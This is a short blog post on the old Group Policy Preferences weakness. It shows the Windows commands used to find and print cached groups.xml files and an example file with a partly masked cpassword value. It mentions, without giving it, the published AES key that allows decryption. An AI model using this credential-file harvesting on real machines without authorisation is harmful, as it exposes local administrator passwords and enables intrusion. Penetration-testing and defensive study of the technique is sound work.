Local Admin Password Retrieval Technique

Obviously this is a old topic but still relevant and worth mentioning.  Previously I had discussed this same technique but mapping a drive to Sysvol and pulling it out that way; however, I found a much easier way… especially since you may not always have a connection to a server.

If you do a search for groups.xml on the local machine, you can find it stored in a number of places.  For example:

c:\> dir groups.xml /s


From there, we can view the contents – again, without needing to touch an AD server.

c:\> type groups.xml

<?xml version=”1.0″ encoding=”UTF-8″ ?><Groups clsid=”{3125E937-EB16-4b4c-9934-544FC6D24D26}”>
<User clsid=”{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}” name=”xxx-workstation” image=”2″ changed=”2015-01-23 20:46:24″ uid=”{44C5BADF-53AA-45B5-9B59-46992E24539C}” policyApplied=”1″>
<Properties action=”U” newName=”” fullName=”XXX Workstation Administration” description=”XXX Workstation Administration” cpassword=”ie/nEVShK/XXX0APiSgSMl6X2PL3C+MBhkL6byzXXX” changeLogon=”0″ noChange=”0″ neverExpires=”1″ acctDisabled=”0″ subAuthority=”” userName=”xxx-workstation”></Properties></User>
<Group clsid=”{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}” name=”Administrators” image=”2″ changed=”2015-01-23 20:46:53″ uid=”{C61E28C6-3136-45D6-8D18-1C301FA0CCC5}” policyApplied=”1″>
<Properties action=”U” newName=”” description=”” deleteAllUsers=”0″ deleteAllGroups=”0″ removeAccounts=”0″ groupName=”Administrators”>
<Member name=”xx-workstation” action=”ADD” sid=”S-1-5-21-608828738-4017660839-3836957458-1005″></Member></Members></Properties></Group></Groups>

The line from the above output that we care about is:


Microsoft published the AES encryption key here (thanks!):


One can use various free tools to decrypt GPP passwords:



One thought on “Local Admin Password Retrieval Technique

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s